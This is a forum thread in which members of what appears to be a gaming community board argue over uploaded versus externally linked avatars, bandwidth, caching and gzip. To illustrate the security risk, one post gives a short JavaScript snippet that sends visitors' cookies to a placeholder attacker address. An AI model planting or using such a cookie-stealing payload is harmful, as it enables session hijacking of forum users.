Could you make the avatars uploadable rather than having the current system where users put in a url?
There are 2 problems with the current system:
1) as the avatar is offsite, the size restrictions cannot be imposed
2)There are certain security risks regarding javascript embedding, cookies and external avatars. These existed in the beta version of phpbb2. i am not sure if they have been fixed...
Quote from: HtwoCould you make the avatars uploadable rather than having the current system where users put in a url?
There are 2 problems with the current system:
1) as the avatar is offsite, the size restrictions cannot be imposed
2)There are certain security risks regarding javascript embedding, cookies and external avatars. These existed in the beta version of phpbb2. i am not sure if they have been fixed...
Right. I'm not keen on having the server issue all the graphics i.e. avatars I thought you knew my views on that? :o I don't want the bandwidth from the server being used up for delivering uploaded avatars.
I may hack the templates to force 80x80. Dunno about the security issues you hinted at show me some evidence please and I'll have a re-think.
I prefer people to link to external avatars and on the whole, people who have had big avatars i.e. too large have withdrawn them pretty quickly so thanks to those people for reacting as they did.
No definately not! We need to find out what the average daily b/w will be once the full site is set up (and the Jolt server is up) before we consider that. Could be that map downloads/postings/etc push us close to the limit.
If there are security issues then disable avatars for a couple of weeks. No big deal really - I'm sure everyone can do without them for a bit.
Quote from: Lt_O_Top
Right. I'm not keen on having the server issue all the graphics i.e. avatars I thought you knew my views on that? :o I don't want the bandwidth from the server being used up for delivering uploaded avatars.
I think you greatly overestimate how much bandwith doing this would use. The Avatars are static files on the server. As a result when someone views a thread, their browser caches all the avatars in that thread.
For example, even if Rizla were to view 100 threads in one day, all of which contain my avatar, his browser would only download it once. (this assumes he doesn't wipe the cache, and hasn't set it to 0 which is a fair assumption)
Personally I find that avatars account for less than 1MB of data transferes per month on my system, I run 3 BB's and have more users, although I suppose they are quite a bit less active than you lot :)
Quote from: Lt_O_Top
I may hack the templates to force 80x80. Dunno about the security issues you hinted at show me some evidence please and I'll have a re-think.
I didn't want to go into any detail here, and in any case, I'm not too sure about this. If some is able to execute javascript on a forum, they can use it to take cookies easily:
<script language="javascript" type="text/javascript">document.write('<img height=0 width=0 src="http://attackers_address/'+document.cookie+'">');</script>in the above example, if the javascript was executed the cookies of people who executed the script (by viewing a thread that contained it) would turn up in the error logs of the attackers web server.
BBCode is very well made, and it is impossible to embed javascript with it. But it used to be the case (and might still be) that the way avatars were handled was lax, allowing the insertion of things that IE would interpret as Javascript...
Have you enabled Gzip yet BTW?
QuoteFor example, even if Rizla were to view 100 threads in one day, all of which contain my avatar, his browser would only download it once. (this assumes he doesn't wipe the cache, and hasn't set it to 0 which is a fair assumption)
Unfortunately it's not a fair assumption - my cache lives in a RAMdisk and is wiped every 15 minutes (at most). However I do recognise I am not a normal user :wink:
I do take your point - especially the Javascript issues.
I'd prefer to see what happens once the Jolt server goes up - there will probably be 8 or 9 new maps that need hosting somewhere and at 1-3MB/map it could eat up b/w pretty damn fast if we have a lot of visitors to the Jolt server.
Also you know what a bunch of spammers we are :lol:
Doesn't look like gzip is enabled. I'll leave that decision to Mike...
Htwo,
Thanks for raising these issues.
I'll have a look around at other sites see how they deal with Avatars and I'll read up on GZip compression. I don't like turning on options without knowing what they do!! :lol:
I think we're right though to tread cautiously until we know the bandwidth being used.
Kind regards,
Mike T